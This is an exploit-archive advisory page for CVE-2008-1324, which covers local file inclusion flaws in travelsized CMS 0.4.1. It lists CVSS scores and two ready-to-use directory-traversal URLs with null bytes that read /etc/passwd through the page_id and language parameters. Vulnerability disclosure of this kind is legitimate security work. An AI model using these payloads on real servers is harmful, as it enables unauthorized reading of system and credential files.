travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

2008.03.13

Credit: muuratsalo

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-1324

CWE: CWE-22

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

download   http://sourceforge.net/projects/uberghey/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
http://localhost/travelsized-0.4.1/index.php?page_id=../../../../../../.
./../../../etc/passwd%00
http://localhost/travelsized-0.4.1/index.php?language=../../../../../../
../../../../etc/passwd%00

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.